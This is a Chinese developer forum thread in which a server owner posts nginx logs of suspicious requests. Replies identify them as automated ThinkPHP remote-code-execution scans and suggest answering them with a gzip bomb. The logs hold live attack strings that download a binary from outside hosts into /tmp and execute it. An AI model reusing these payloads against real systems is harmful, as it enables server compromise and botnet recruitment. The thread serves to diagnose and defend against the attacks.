V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
taogen
V2EX  ›  程序员

服务器有很多莫名请求,请大佬们看下这是什么操作?

  •  
  •   taogen ·
    tagnja · 2020-02-03 19:13:24 +08:00 · 2789 次点击
    这是一个创建于 1754 天前的主题,其中的信息可能已经有所发展或是发生改变。

    RT,下面是 nginx 日志

    42.116.132.217 - - [03/Feb/2020:04:46:21 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    95.56.46.16 - - [03/Feb/2020:04:51:17 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    42.115.154.162 - - [03/Feb/2020:04:56:31 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    42.113.229.201 - - [03/Feb/2020:04:56:57 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    42.117.213.8 - - [03/Feb/2020:05:12:56 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    183.80.226.167 - - [03/Feb/2020:05:43:14 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    1.54.51.37 - - [03/Feb/2020:06:43:59 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    183.81.106.253 - - [03/Feb/2020:06:46:19 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    176.163.32.15 - - [03/Feb/2020:07:16:57 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    189.154.64.227 - - [03/Feb/2020:08:27:51 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    41.248.244.123 - - [03/Feb/2020:09:46:58 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    95.58.245.64 - - [03/Feb/2020:10:01:27 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    1.54.146.50 - - [03/Feb/2020:11:44:40 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    42.113.211.238 - - [03/Feb/2020:12:02:09 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    42.118.70.112 - - [03/Feb/2020:12:41:39 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    118.68.197.228 - - [03/Feb/2020:12:56:56 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    42.117.137.217 - - [03/Feb/2020:13:08:34 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    60.24.45.148 - - [03/Feb/2020:13:39:36 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    58.186.78.50 - - [03/Feb/2020:13:46:47 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    118.71.4.28 - - [03/Feb/2020:15:07:50 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    1.53.177.26 - - [03/Feb/2020:15:08:30 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    61.220.75.34 - - [03/Feb/2020:15:40:00 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    207.216.89.109 - - [03/Feb/2020:16:19:00 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    42.114.189.116 - - [03/Feb/2020:17:52:09 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    61.80.151.145 - - [03/Feb/2020:18:04:37 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
    74.80.28.217 - - [03/Feb/2020:18:25:37 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 575 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
    190.122.112.58 - - [03/Feb/2020:18:40:04 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://zxcxffyttygbbgfgf12121bot.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Karu/2.0"
    
    9 条回复    2020-02-04 18:35:32 +08:00
    bosskwei
        1
    bosskwei  
       2020-02-03 19:16:38 +08:00   ❤️ 1
    批量扫肉鸡的,挂 shell
    opengps
        2
    opengps  
       2020-02-03 19:19:18 +08:00 via Android
    找你漏洞,注入它代码
    virusdefender
        3
    virusdefender  
       2020-02-03 19:45:28 +08:00
    thinkphp 的漏洞扫描器
    OllyDebug
        4
    OllyDebug  
       2020-02-03 19:48:40 +08:00 via iPhone
    漏洞扫描
    xiri
        5
    xiri  
       2020-02-03 20:10:06 +08:00
    全网批量扫描的,不一定是针对你,扫到了就挂上 shell 成肉鸡了
    ysc3839
        6
    ysc3839  
       2020-02-04 06:17:28 +08:00 via Android   ❤️ 3
    你的网站如果不用 PHP 的话,可以考虑遇到 请求 .php 文件的时候返回一个 gzip 炸弹。
    gzip 炸弹意思是把很大的空白数据用 gzip 压缩,压缩后会变得很小,如果客户端会自动解压 gzip 的话就会消耗大量内存,很有可能崩溃。
    taogen
        7
    taogen  
    OP
       2020-02-04 07:21:41 +08:00 via Android
    @ysc3839 可以尝试一下。多谢啦!
    chenqh
        8
    chenqh  
       2020-02-04 18:31:10 +08:00
    @ysc3839 这个怎么搞?
    ysc3839
        9
    ysc3839  
       2020-02-04 18:35:32 +08:00 via Android
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2672 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 26ms · UTC 12:22 · PVG 20:22 · LAX 04:22 · JFK 07:22
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.